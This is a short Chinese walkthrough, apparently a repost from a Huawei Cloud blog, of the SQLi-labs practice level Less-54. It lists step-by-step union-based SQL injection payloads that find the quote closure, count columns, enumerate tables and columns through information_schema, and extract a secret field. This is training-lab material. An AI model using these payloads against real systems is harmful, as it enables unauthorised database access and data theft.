当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)

SQL注入 Less54(限制次数的SQL注入+union注入)

2022-07-31 22:34:00 华为云

在这里插入图片描述
限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变

?id=1

?id=1'
发现没有报错信息

?id=1"
回显正常,直接排查双引号开头的闭合方式

?id=1'--+
?id=1')--+
?id=1'))--+
单引号回显正常,所以是单引号闭合

?id=1' order by 3--+ 回显正常
?id=1' order by 4--+ 回显错误
所以有三列

?id=-1' union select 1,version(),database()--+
在这里插入图片描述

?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
在这里插入图片描述
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

在这里插入图片描述

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+

在这里插入图片描述

原网站

版权声明
本文为[华为云]所创,转载请带上原文链接,感谢
https://bbs.huaweicloud.com/blogs/367600

边栏推荐

猜你喜欢

随机推荐